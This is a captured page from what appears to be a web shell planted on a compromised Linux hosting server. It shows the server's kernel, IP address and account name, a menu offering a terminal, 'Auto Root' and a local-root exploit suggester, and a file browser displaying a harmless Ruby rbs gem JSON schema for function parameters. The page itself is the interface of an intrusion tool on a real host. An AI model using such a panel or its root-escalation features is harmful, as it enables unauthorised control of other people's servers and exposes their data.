Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
gems /
gems /
rbs-3.8.0 /
schema /
Delete
Unzip
Name
Size
Permission
Date
Action
annotation.json
350
B
-rw-r--r--
2026-04-07 16:51
comment.json
492
B
-rw-r--r--
2026-04-07 16:51
decls.json
7.28
KB
-rw-r--r--
2026-04-07 16:51
function.json
2.03
KB
-rw-r--r--
2026-04-07 16:51
location.json
1.01
KB
-rw-r--r--
2026-04-07 16:51
members.json
6.34
KB
-rw-r--r--
2026-04-07 16:51
methodType.json
1
KB
-rw-r--r--
2026-04-07 16:51
typeParam.json
795
B
-rw-r--r--
2026-04-07 16:51
types.json
6.88
KB
-rw-r--r--
2026-04-07 16:51
Save
Rename
{ "$schema": "http://json-schema.org/draft-04/schema#", "definitions": { "param": { "title": "Function parameter with type and optional name: `Integer size`, `::String name`, `untyped`, ...", "type": "object", "properties": { "type": { "$ref": "types.json" }, "name": { "oneOf": [ { "type": "string" }, { "type": "null" } ] } }, "required": ["type", "name"] } }, "properties": { "required_positionals": { "title": "Required positional parameters", "type": "array", "items": { "$ref": "#/definitions/param" } }, "optional_positionals": { "title": "Optional positional parameters", "type": "array", "items": { "$ref": "#/definitions/param" } }, "rest_positionals": { "title": "Rest parameter", "oneOf": [ { "$ref": "#/definitions/param" }, { "type": "null" } ] }, "trailing_positionals": { "title": "Trailing potisional parameters", "type": "array", "items": { "$ref": "#/definitions/param" } }, "required_keywords": { "title": "Required keyword parameters", "additionalProperties": { "$ref": "#/definitions/param" } }, "optional_keywords": { "title": "Optional keyword parameters", "additionalProperties": { "$ref": "#/definitions/param" } }, "rest_keywords": { "title": "Rest keyword parameters", "oneOf": [ { "$ref": "#/definitions/param" }, { "type": "null" } ] }, "return_type": { "title": "Return type of a function", "$ref": "types.json" } }, "required": ["required_positionals", "optional_positionals", "rest_positionals", "trailing_positionals", "required_keywords", "optional_keywords", "rest_keywords", "return_type"] }